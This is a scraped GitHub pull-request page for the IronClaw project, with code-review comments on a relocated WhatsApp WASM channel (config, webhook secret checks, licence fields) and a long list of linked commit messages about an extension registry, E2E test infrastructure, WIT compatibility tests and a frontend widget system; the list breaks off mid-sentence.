Move whatsapp channel source to channels-src/ for consistency#1
Move whatsapp channel source to channels-src/ for consistency#1bowenwang1996 wants to merge 1 commit intomainfrom
Conversation
All WASM channel sources are now in channels-src/: - slack/ - telegram/ - whatsapp/ (moved from channels/) Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
There was a problem hiding this comment.
Copilot wasn't able to review any files in this pull request.
💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.
There was a problem hiding this comment.
The release profile is missing the codegen-units = 1 optimization that is present in both the Slack and Telegram channels. This optimization can improve code generation for size which is important for WASM components. Consider adding it for consistency and better optimization.
| lto = true | |
| codegen-units = 1 |
There was a problem hiding this comment.
The code logs a warning when the secret is not validated but continues to process the message anyway (line 307). The comment on line 304 mentions "Return 401" but there's no actual return statement. This could allow unauthorized webhook requests to be processed.
Consider adding a return statement here to reject requests with invalid tokens.
| // Return 401 but note that host should have already rejected these | |
| return json_response( | |
| 401, | |
| serde_json::json!({"error": "Unauthorized"}), | |
| ); |
There was a problem hiding this comment.
The API version is hardcoded to "v18.0" in the URL, but the WhatsAppConfig struct has a configurable api_version field that is parsed from the configuration file (lines 232-234, 257-260). The config value is logged during startup (line 266) but never actually used when making API calls.
Either the api_version from config should be used here, or the api_version field should be removed from the config struct if it's not meant to be configurable.
| // Build WhatsApp API URL with placeholders | |
| // Host will replace {WHATSAPP_API_VERSION} in the URL and {WHATSAPP_ACCESS_TOKEN} in the Authorization header | |
| let api_url = format!( | |
| "https://graph.facebook.com/{WHATSAPP_API_VERSION}/{}/messages", |
There was a problem hiding this comment.
The reply_to_message configuration field (defaulting to true) is defined but never used in the implementation. The WhatsAppMessageMetadata stores the original message_id which could be used to add a context field to the response payload for threading, but this is not implemented.
If reply context is intended to be supported, the on_respond function should conditionally add a context field to the payload based on this config. However, given the stateless nature of WASM components in this architecture, storing and accessing config after on_start may not be feasible. Consider either implementing this feature using the message_id from metadata, or removing the unused config field to avoid confusion.
| } | |
| fn default_api_version() -> String { | |
| "v18.0".to_string() | |
| } |
There was a problem hiding this comment.
The validation regex for whatsapp_access_token may be too restrictive. WhatsApp Cloud API access tokens from Meta can contain additional characters beyond [A-Za-z0-9_-], including pipe characters (|) and other special characters. The current regex pattern may reject valid tokens.
Consider using a more permissive pattern or verifying the actual character set used by Meta access tokens.
| "validation": "^\\S+$" |
There was a problem hiding this comment.
The webhook verification function doesn't check the secret_validated field from the request. While the comment on line 448 mentions that "Verify token is validated by host via secret_validated field", there's no actual verification of this field in the code. This could allow verification requests with invalid verify tokens to succeed if they have the correct mode and challenge parameters.
Consider adding a check for req.secret_validated similar to the one in on_http_request (line 299) to ensure the verify token was validated by the host before returning the challenge.
There was a problem hiding this comment.
The Cargo.toml is missing the license field that is present in the other channel implementations (slack and telegram both use "MIT OR Apache-2.0"). This should be added for consistency across the channels and proper licensing information.
| description = "WhatsApp Cloud API channel for IronClaw" | |
| license = "MIT OR Apache-2.0" |
|
Thanks, I moved actually in another PR when was adding |
- Use manifest.name (not crate_name) for installed filenames so discovery, auth, and CLI commands all agree on the stem (#1) - Add AlreadyInstalled error variant instead of misleading ExtensionNotFound (#2) - Add DownloadFailed error variant with URL context instead of stuffing URLs into PathBuf (#3) - Validate HTTP status with error_for_status() before reading response bytes in artifact downloads (#4) - Switch build_wasm_component to tokio::process::Command with status() so build output streams to the terminal (#6) - Find WASM artifact by crate_name specifically instead of picking the first .wasm file in the release directory (#7) - Add is_file() guard in catalog loader to skip directories (#8) - Detect ambiguous bare-name lookups when both tools/<name> and channels/<name> exist, with get_strict() returning an error (#9) - Fix wizard step_extensions to check tool.name for installed detection, consistent with the new naming (#11, #12) - Fix redundant closures and map_or clippy warnings in changed files Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
- Use manifest.name (not crate_name) for installed filenames so discovery, auth, and CLI commands all agree on the stem (#1) - Add AlreadyInstalled error variant instead of misleading ExtensionNotFound (#2) - Add DownloadFailed error variant with URL context instead of stuffing URLs into PathBuf (#3) - Validate HTTP status with error_for_status() before reading response bytes in artifact downloads (#4) - Switch build_wasm_component to tokio::process::Command with status() so build output streams to the terminal (#6) - Find WASM artifact by crate_name specifically instead of picking the first .wasm file in the release directory (#7) - Add is_file() guard in catalog loader to skip directories (#8) - Detect ambiguous bare-name lookups when both tools/<name> and channels/<name> exist, with get_strict() returning an error (#9) - Fix wizard step_extensions to check tool.name for installed detection, consistent with the new naming (#11, #12) - Fix redundant closures and map_or clippy warnings in changed files Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
…tion (#238) * feat: add extension registry with metadata catalog, CLI, and onboarding integration Adds a central registry that catalogs all 14 available extensions (10 tools, 4 channels) with their capabilities, auth requirements, and artifact references. The onboarding wizard now shows installable channels from the registry and offers tool installation as a new Step 7. - registry/ folder with per-extension JSON manifests and bundle definitions - src/registry/ module: manifest structs, catalog loader, installer - `ironclaw registry list|info|install|install-defaults` CLI commands - Setup wizard enhanced: channels from registry, new extensions step (8 steps) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(setup): resolve workspace errors for tool crates and channels-only onboarding Tool crates in tools-src/ and channels-src/ failed `cargo metadata` during onboard install because Cargo resolved them as part of the root workspace. Add `[workspace]` table to each standalone crate and extend the root `workspace.exclude` list so they build independently. Channels-only mode (`onboard --channels-only`) failed with "Secrets not configured" and "No database connection" because it skipped database and security setup. Add `reconnect_existing_db()` to establish the DB connection and load saved settings before running channel configuration. Also improve the tunnel "already configured" display to show full provider details (domain, mode, command) instead of just the provider name. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(registry): address PR review feedback on installer and catalog - Use manifest.name (not crate_name) for installed filenames so discovery, auth, and CLI commands all agree on the stem (#1) - Add AlreadyInstalled error variant instead of misleading ExtensionNotFound (#2) - Add DownloadFailed error variant with URL context instead of stuffing URLs into PathBuf (#3) - Validate HTTP status with error_for_status() before reading response bytes in artifact downloads (#4) - Switch build_wasm_component to tokio::process::Command with status() so build output streams to the terminal (#6) - Find WASM artifact by crate_name specifically instead of picking the first .wasm file in the release directory (#7) - Add is_file() guard in catalog loader to skip directories (#8) - Detect ambiguous bare-name lookups when both tools/<name> and channels/<name> exist, with get_strict() returning an error (#9) - Fix wizard step_extensions to check tool.name for installed detection, consistent with the new naming (#11, #12) - Fix redundant closures and map_or clippy warnings in changed files Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(setup): restore DB connection fields after settings reload reconnect_postgres() and reconnect_libsql() called Settings::from_db_map() which overwrote database_url / libsql_path / libsql_url set from env vars. Also use get_strict() in cmd_info to surface ambiguous bare-name errors. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: fix clippy collapsible_if and print_literal warnings Collapse nested if-let chains and inline string literals in format macros to satisfy CI clippy lint checks (deny warnings). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(registry): prefer artifacts for install-defaults and improve dir lookup - InstallDefaults now defaults to downloading pre-built artifacts (matching `registry install` behavior), with --build flag for source builds. - find_registry_dir() walks up 3 ancestor levels from the exe and adds a CARGO_MANIFEST_DIR fallback, matching load_registry_catalog() logic. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
…tion (nearai#238) * feat: add extension registry with metadata catalog, CLI, and onboarding integration Adds a central registry that catalogs all 14 available extensions (10 tools, 4 channels) with their capabilities, auth requirements, and artifact references. The onboarding wizard now shows installable channels from the registry and offers tool installation as a new Step 7. - registry/ folder with per-extension JSON manifests and bundle definitions - src/registry/ module: manifest structs, catalog loader, installer - `ironclaw registry list|info|install|install-defaults` CLI commands - Setup wizard enhanced: channels from registry, new extensions step (8 steps) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(setup): resolve workspace errors for tool crates and channels-only onboarding Tool crates in tools-src/ and channels-src/ failed `cargo metadata` during onboard install because Cargo resolved them as part of the root workspace. Add `[workspace]` table to each standalone crate and extend the root `workspace.exclude` list so they build independently. Channels-only mode (`onboard --channels-only`) failed with "Secrets not configured" and "No database connection" because it skipped database and security setup. Add `reconnect_existing_db()` to establish the DB connection and load saved settings before running channel configuration. Also improve the tunnel "already configured" display to show full provider details (domain, mode, command) instead of just the provider name. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(registry): address PR review feedback on installer and catalog - Use manifest.name (not crate_name) for installed filenames so discovery, auth, and CLI commands all agree on the stem (nearai#1) - Add AlreadyInstalled error variant instead of misleading ExtensionNotFound (nearai#2) - Add DownloadFailed error variant with URL context instead of stuffing URLs into PathBuf (nearai#3) - Validate HTTP status with error_for_status() before reading response bytes in artifact downloads (nearai#4) - Switch build_wasm_component to tokio::process::Command with status() so build output streams to the terminal (nearai#6) - Find WASM artifact by crate_name specifically instead of picking the first .wasm file in the release directory (nearai#7) - Add is_file() guard in catalog loader to skip directories (nearai#8) - Detect ambiguous bare-name lookups when both tools/<name> and channels/<name> exist, with get_strict() returning an error (nearai#9) - Fix wizard step_extensions to check tool.name for installed detection, consistent with the new naming (nearai#11, nearai#12) - Fix redundant closures and map_or clippy warnings in changed files Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(setup): restore DB connection fields after settings reload reconnect_postgres() and reconnect_libsql() called Settings::from_db_map() which overwrote database_url / libsql_path / libsql_url set from env vars. Also use get_strict() in cmd_info to surface ambiguous bare-name errors. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: fix clippy collapsible_if and print_literal warnings Collapse nested if-let chains and inline string literals in format macros to satisfy CI clippy lint checks (deny warnings). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(registry): prefer artifacts for install-defaults and improve dir lookup - InstallDefaults now defaults to downloading pre-built artifacts (matching `registry install` behavior), with --build flag for source builds. - find_registry_dir() walks up 3 ancestor levels from the exe and adds a CARGO_MANIFEST_DIR fallback, matching load_registry_catalog() logic. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
- Increase wait_for_responses polling to exponential backoff (50ms-500ms) and raise default timeout from 15s to 30s to reduce CI flakiness (#1) - Strengthen prompt_injection_resilience test with positive safety layer assertion via has_safety_warnings(), enable injection_check (#2) - Add assert_tool_order() helper and tools_order field in TraceExpects for verifying tool execution ordering in multi-step traces (#3) - Document TraceLlm sequential-call assumption for concurrency (#6) - Clean up CleanupGuard with PathKind enum instead of shotgun remove_file + remove_dir_all on every path (#8) - Fix coverage.sh: default to --lib only, fix multi-filter syntax, add COV_ALL_TARGETS option - Add coverage/ to .gitignore - Remove planning docs from PR [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* refactor: extract shared assertion helpers to support/assertions.rs Move 5 assertion helpers from e2e_spot_checks.rs to a shared module. Add assert_all_tools_succeeded and assert_tool_succeeded for eliminating false positives in E2E tests. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add tool output capture via tool_results() accessor Extract (name, preview) from ToolResult status events in TestChannel and TestRig, enabling content assertions on tool outputs. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: correct tool parameters in 3 broken trace fixtures - tool_time.json: add missing "operation": "now" for time tool - robust_correct_tool.json: same fix - memory_full_cycle.json: change "path" to "target" for memory_write Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add tool success and output assertions to eliminate false positives Every E2E test that exercises tools now calls assert_all_tools_succeeded. Added tool output content assertions where tool results are predictable (time year, read_file content, memory_read content). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: capture per-tool timing from ToolStarted/ToolCompleted events Record Instant on ToolStarted and compute elapsed duration on ToolCompleted, wiring real timing data into collect_metrics() instead of hardcoded zeros. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * refactor: add RAII CleanupGuard for temp file/dir cleanup in tests Replace manual cleanup_test_dir() calls and inline remove_file() with Drop-based CleanupGuard that ensures cleanup even if a test panics. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: add Drop impl and graceful shutdown for TestRig Wrap agent_handle in Option so Drop can abort leaked tasks. Signal the channel shutdown before aborting for future cooperative shutdown. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: replace agent startup sleep with oneshot ready signal Use a oneshot channel fired in Channel::start() instead of a fixed 100ms sleep, eliminating the race condition on slow systems. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: replace fragile string-matching iteration limit with count-based detection Use tool completion count vs max_tool_iterations instead of scanning status messages for "iteration"/"limit" substrings. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: use assert_all_tools_succeeded for memory_full_cycle test Remove incorrect comment about memory_tree failing with empty path (it actually succeeds). Omit empty path from fixture and use the standard assert_all_tools_succeeded instead of per-tool assertions. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * refactor: promote benchmark metrics types to library code Move TraceMetrics, ScenarioResult, RunResult, MetricDelta, and compare_runs() from tests/support/metrics.rs to src/benchmark/metrics.rs. Existing tests use re-export for backward compatibility. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add Scenario and Criterion types for agent benchmarking Scenario defines a task with input, success criteria, and resource limits. Criterion is an enum of programmatic checks (tool_used, response_contains, etc.) evaluated without LLM judgment. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add initial benchmark scenario suite (12 scenarios across 5 categories) Scenarios cover tool_selection, tool_chaining, error_recovery, efficiency, and memory_operations. All loaded from JSON with deserialization validation test. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add benchmark runner with BenchChannel and InstrumentedLlm BenchChannel is a minimal Channel implementation for benchmarks. InstrumentedLlm wraps any LlmProvider to capture per-call metrics. Runner creates a fresh agent per scenario, evaluates success criteria, and produces RunResult with timing, token, and cost metrics. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat: add baseline management, reports, and benchmark entry point - baseline.rs: load/save/promote benchmark results - report.rs: format comparison reports with regression detection - benchmark_runner.rs: integration test with real LLM (feature-gated) - Add benchmark feature flag to Cargo.toml Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: apply cargo fmt to benchmark module Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add multi-turn scenario types with setup, judge, ResponseNotContains Add BenchScenario, Turn, TurnAssertions, JudgeConfig, ScenarioSetup, WorkspaceSetup, SeedDocument types for multi-turn benchmark scenarios. Add ResponseNotContains criterion variant. Add TurnAssertions::to_criteria() converter for backward compat with existing evaluation engine. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add JSON scenario loader with recursive discovery and tag filter Add load_bench_scenarios() for the new BenchScenario format with recursive directory traversal and tag-based filtering. Create 4 initial trajectory scenarios across tool-selection, multi-turn, and efficiency categories. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): multi-turn runner with workspace seeding and per-turn metrics Add run_bench_scenario() that loops over BenchScenario turns, seeds workspace documents, collects per-turn metrics (tokens, tool calls, wall time), and evaluates per-turn assertions. Add TurnMetrics to metrics.rs and clear_for_next_turn() to BenchChannel. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add LLM-as-judge scoring with prompt formatting and score parsing Create judge.rs with format_judge_prompt, parse_judge_score, and judge_turn. Wire into run_bench_scenario for turns with judge config -- scores below min_score fail the turn. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add CLI subcommand (ironclaw benchmark) Add BenchmarkCommand with --tags, --scenario, --no-judge, --timeout, --update-baseline flags. Wire into Command enum and main.rs dispatch. Feature-gated behind benchmark flag. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): per-scenario JSON output with full trajectory Add save_scenario_results() that writes per-scenario JSON files alongside the run summary. Each scenario gets its own file with turn_metrics trajectory. Update CLI to use new output format. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add ToolRegistry::retain_only and wire tool filtering in scenarios Add a retain_only() method to ToolRegistry that filters tools down to a given allowlist. Wire this into run_bench_scenario() so that when a scenario specifies a tools list in its setup, only those tools are available during the benchmark run. Includes two tests for the new method: one verifying filtering works and one verifying empty input is a no-op. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): wire identity overrides into workspace before agent start Add seed_identity() helper that writes identity files (IDENTITY.md, USER.md, etc.) into the workspace before the agent starts, so that workspace.system_prompt() picks them up. Wire it into run_bench_scenario() after workspace seeding. Include a test that verifies identity files are written and readable. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add --parallel and --max-cost CLI flags Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(benchmark): use feature-conditional snapshot names for CLI help tests Prevents snapshot conflicts between default (no benchmark) and all-features (with benchmark) builds by using separate snapshot names per feature set. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): parallel execution with JoinSet and budget cap enforcement Replace sequential loop in run_all_bench() with parallel execution using JoinSet + semaphore when config.parallel > 1. Add budget cap enforcement that skips remaining scenarios when max_total_cost_usd is exceeded. Track skipped count in RunResult.skipped_scenarios and display it in format_report(). Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add tool restriction and identity override test scenarios Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * chore: fix formatting for Phase 3 Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add SkillRegistry::retain_only and wire skill filtering in scenarios Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(benchmark): add --json flag for machine-readable output Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * ci: add GitHub Actions benchmark workflow (manual trigger) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * refactor(benchmark): remove in-tree benchmark harness, keep retain_only utilities Move benchmark-specific code out of ironclaw in preparation for the nearai/benchmarks trajectory adapter. This removes: - src/benchmark/ (runner, scenarios, metrics, judge, report, etc.) - src/cli/benchmark.rs and the Benchmark CLI subcommand - benchmarks/ data directory (scenarios + trajectories) - .github/workflows/benchmark.yml - The "benchmark" Cargo feature flag What remains: - ToolRegistry::retain_only() and SkillRegistry::retain_only() - Test support types (TraceMetrics, InstrumentedLlm) inlined into tests/support/ instead of re-exporting from the deleted module Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * docs: add README for LLM trace fixture format Documents the trajectory JSON format, response types, request hints, directory structure, and how to write new traces. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * feat(test): unify trace format around turns, add multi-turn support Introduce TraceTurn type that groups user_input with LLM response steps, making traces self-contained conversation trajectories. Add run_trace() to TestRig for automatic multi-turn replay. Backward-compatible: flat "steps" JSON is deserialized as a single turn transparently. Includes all trace fixtures (spot, coverage, advanced), plan docs, and new e2e tests for steering, error recovery, long chains, memory, and prompt injection resilience. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(test): fix CI failures after merging main - Fix tool_json fixture: use "data" parameter (not "input") to match JsonTool schema - Fix status_events test: remove assertion for "time" tool that isn't in the fixture (only "echo" calls are used) - Allow dead_code in test support metrics/instrumented_llm modules (utilities for future benchmark tests) [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * Working on recording traces and testing them * feat(test): add declarative expects to trace fixtures, split infra tests Add TraceExpects struct with 9 optional assertion fields (response_contains, tools_used, all_tools_succeeded, etc.) that can be declared in fixture JSON instead of hand-written Rust. Add verify_expects() and run_recorded_trace() so recorded trace tests become one-liners. Split trace infra tests (deserialization, backward compat) into tests/trace_format.rs which doesn't require the libsql feature gate. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * refactor(test): add expects to all trace fixtures, simplify e2e tests Add declarative expects blocks to all 19 trace fixture JSONs across spot/, coverage/, advanced/, and root directories. Update all 8 e2e test files to use verify_trace_expects() / run_and_verify_trace(), replacing ~270 lines of hand-written assertions with fixture-driven verification. Tests that check things beyond expects (file content on disk, metrics, event ordering) keep those extra assertions alongside the declarative ones. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(test): adapt tests to AppBuilder refactor, fix formatting Update test files to work with refactored TestRigBuilder that uses AppBuilder::build_all() (removing with_tools/with_workspace methods). Update telegram_check fixture to use tool_list instead of echo. Fix cargo fmt issues in src/llm/mod.rs and src/llm/recording.rs. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * refactor(test): deduplicate support unit tests into single binary Support modules (assertions, cleanup, test_channel, test_rig, trace_llm) had #[cfg(test)] mod tests blocks that were compiled and run 12 times — once per e2e test binary that declares `mod support;`. Extracted all 29 support unit tests into a dedicated `tests/support_unit_tests.rs` so they run exactly once. [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: fix trailing newlines in support files Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * refactor(test): unify trace types and fix recorded multi-turn replay Import shared types (TraceStep, TraceResponse, TraceToolCall, RequestHint, ExpectedToolResult, MemorySnapshotEntry, HttpExchange*) from ironclaw::llm::recording instead of redefining them in trace_llm.rs. Fix the flat-steps deserializer to split at UserInput boundaries into multiple turns, instead of filtering them out and wrapping everything into a single turn. This enables recorded multi-turn traces to be replayed as proper multi-turn conversations via run_trace(). [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(test): fix CI failures - unused imports and missing struct fields - Add #[allow(unused_imports)] on pub use re-exports in trace_llm.rs (types are re-exported for downstream test files, not used locally) - Add `..` to ToolCompleted pattern in test_channel.rs to match new `error` and `parameters` fields Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(test): fix CI failures after merging main - Add missing `error` and `parameters` fields to ToolCompleted constructors in support_unit_tests.rs - Add `..` to ToolCompleted pattern match in support_unit_tests.rs - Add #[allow(dead_code)] to CleanupGuard, LlmTrace impl, and TraceLlm impl (only used behind #[cfg(feature = "libsql")]) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * Adding coverage running script * fix(test): address review feedback on E2E test infrastructure - Increase wait_for_responses polling to exponential backoff (50ms-500ms) and raise default timeout from 15s to 30s to reduce CI flakiness (#1) - Strengthen prompt_injection_resilience test with positive safety layer assertion via has_safety_warnings(), enable injection_check (#2) - Add assert_tool_order() helper and tools_order field in TraceExpects for verifying tool execution ordering in multi-step traces (#3) - Document TraceLlm sequential-call assumption for concurrency (#6) - Clean up CleanupGuard with PathKind enum instead of shotgun remove_file + remove_dir_all on every path (#8) - Fix coverage.sh: default to --lib only, fix multi-filter syntax, add COV_ALL_TARGETS option - Add coverage/ to .gitignore - Remove planning docs from PR [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address PR review - use HashSet in retain_only, improve skill test - Use HashSet for O(N+M) lookup in SkillRegistry::retain_only and ToolRegistry::retain_only instead of linear scan - Strengthen test_retain_only_empty_is_noop in SkillRegistry to pre-populate with a skill before asserting the no-op behavior [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix(test): revert incorrect safety layer assertion in injection test The safety layer sanitizes tool output, not user input. The injection test sends a malicious user message with no tools called, so the safety layer never fires. Reverted to the original test which correctly validates the LLM refuses via trace expects. Also fixed case-sensitive request hint ("ignore" -> "Ignore") to suppress noisy warning. [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: clean stale profdata before coverage run Adds `cargo llvm-cov clean` before each run to prevent "mismatched data" warnings from stale instrumentation profiles. [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: fix formatting in retain_only test [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com> Co-authored-by: Illia Polosukhin <ilblackdragon@gmail.com>
- Switch build script from python3 to jq for JSON parsing, consistent with release.yml and avoids python3 dependency (#1, #7) - Use dirs::home_dir() instead of HOME env var for portability (#2) - Filter extensions by manifest "kind" field instead of path (#3) - Replace .flatten() with explicit error handling in dir iteration (#4, #5) - Split stub_tool_host_functions into stub_shared_host_functions + tool-only tool-invoke stub, since tool-invoke is not in channel WIT (#6) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
* test: add WIT compatibility tests for all WASM tools and channels Adds CI and integration tests to catch WIT interface breakage across all 14 WASM extensions (10 tools + 4 channels). Previously, changing wit/tool.wit or wit/channel.wit could silently break guest-side tools that weren't rebuilt until release time. Three new pieces: 1. scripts/build-wasm-extensions.sh — builds all WASM extensions from source by reading registry manifests. Used by CI and locally. 2. tests/wit_compat.rs — integration tests that compile and instantiate each .wasm binary against the current wasmtime host linker with stubbed host functions. Catches added/removed/renamed WIT functions, signature mismatches, and missing exports. Skips gracefully when artifacts aren't built so `cargo test` still passes standalone. 3. .github/workflows/test.yml — new wasm-wit-compat CI job that builds all extensions then runs instantiation tests on every PR. Added to the branch protection roll-up. [skip-regression-check] Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * style: fix rustfmt formatting in wit_compat tests Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> * fix: address PR review feedback on WIT compat tests - Switch build script from python3 to jq for JSON parsing, consistent with release.yml and avoids python3 dependency (#1, #7) - Use dirs::home_dir() instead of HOME env var for portability (#2) - Filter extensions by manifest "kind" field instead of path (#3) - Replace .flatten() with explicit error handling in dir iteration (#4, #5) - Split stub_tool_host_functions into stub_shared_host_functions + tool-only tool-invoke stub, since tool-invoke is not in channel WIT (#6) Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.6 <noreply@anthropic.com>
…ith widget system (#1725) * feat(frontend): extract frontend into ironclaw_frontend crate with widget extension system Moves all frontend static assets (app.js, style.css, index.html, i18n/*, theme-init.js, favicon.ico) from src/channels/web/static/ into a dedicated ironclaw_frontend crate. The crate also adds: - Layout configuration types (branding, tab order, chat features, per-widget config) - Widget manifest types with named slot system (tab, chat_header, sidebar, etc.) - CSS scoping utility (auto-prefixes selectors with [data-widget="id"]) - Bundle assembly (injects layout config, widgets, and custom CSS into HTML) - Frontend API endpoints (GET/PUT layout, list widgets, serve widget files) - Browser-side IronClaw.registerWidget() API with authenticated fetch, event subscription, theme access, and i18n Widgets are stored in workspace at frontend/widgets/{id}/ and served via the API. Layout config is stored at frontend/layout.json. The agent can create/edit both using existing memory_write/memory_read tools. Gateway handlers now reference ironclaw_frontend::assets constants instead of include_str!() with local paths, completing the separation. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix: address CI failures — license, rust-version, formatting, manifest warnings - Add license = "MIT OR Apache-2.0" to ironclaw_frontend Cargo.toml (cargo-deny) - Fix rust-version to 1.92 to match other crates - Log warning for invalid widget manifests instead of silent skip - Run cargo fmt across all files Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): structured data cards + chat renderer API for rich message rendering Agent responses containing JSON/structured data (like mission results, status objects) now render as styled cards with labeled fields, status badges, and monospaced IDs instead of raw text. Built-in rendering: - Detects inline JSON objects (including Python-style single quotes) - Renders as data cards with key-value rows - Status/state fields get colored badges (success/error/pending) - UUIDs rendered in monospace Extensible via widgets: - IronClaw.registerChatRenderer({ id, match, render, priority }) - First matching renderer wins (priority ordering) - Renderer gets the content element to mutate in place Also adds ChatRenderer variant to WidgetSlot enum. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): hash-based URL navigation for page refresh persistence Navigation state is now encoded in window.location.hash so refreshing the page (or sharing a URL) restores the current view: #/chat → chat tab, assistant thread #/chat/{threadId} → specific conversation #/memory/{path/to/file} → memory browser with file open #/jobs/{jobId} → job detail view #/routines/{id} → routine detail view #/settings/{subtab} → settings sub-tab (extensions, etc.) #/logs → logs tab Hooked into all navigation functions: switchTab, switchThread, switchToAssistant, createNewThread, readMemoryFile, openJobDetail, closeJobDetail, openRoutineDetail, closeRoutineDetail, switchSettingsSubtab. Thread restore is deferred until loadThreads() completes (async), then the pending thread ID is matched against the loaded thread list. Browser back/forward buttons work via hashchange listener. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): auto-open README.md when first visiting Memory tab Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * fix(frontend): preserve URL hash across page refresh Two bugs caused the hash to reset on Cmd+R: 1. Auth URL cleanup (replaceState) stripped the hash fragment — now preserves it via cleaned.hash 2. restoreFromHash() called switchTab() which called updateHash() overwriting the full hash before the detail was restored — now suppresses hash updates during the entire restore sequence Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): seed frontend/README.md with customization guide for agent The agent didn't know it could customize the frontend via workspace writes. Now seeds frontend/README.md on first boot with a guide covering: - Layout config (branding, colors, tab order) via frontend/layout.json - Custom CSS via frontend/custom.css with common variable names - Widget creation (manifest + index.js + style.css) - API endpoints Also seeds frontend/.config with skip_indexing: true so frontend assets aren't chunked/embedded for search. When a user says "change the color scheme to red", the agent can now discover frontend/README.md via memory_tree, read the guide, and write the appropriate layout.json or custom.css. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com> * feat(frontend): wire workspace-aware serving for index.html and style.css The index_handler and css_handler now read from workspace to apply frontend customizations on page load: - index_handler: reads frontend/layout.json, discovers widgets in frontend/widgets/*, reads frontend/custom.css, then calls assemble_index() to inject branding colors, layout config, widget scripts, and custom CSS into the base HTML. Falls 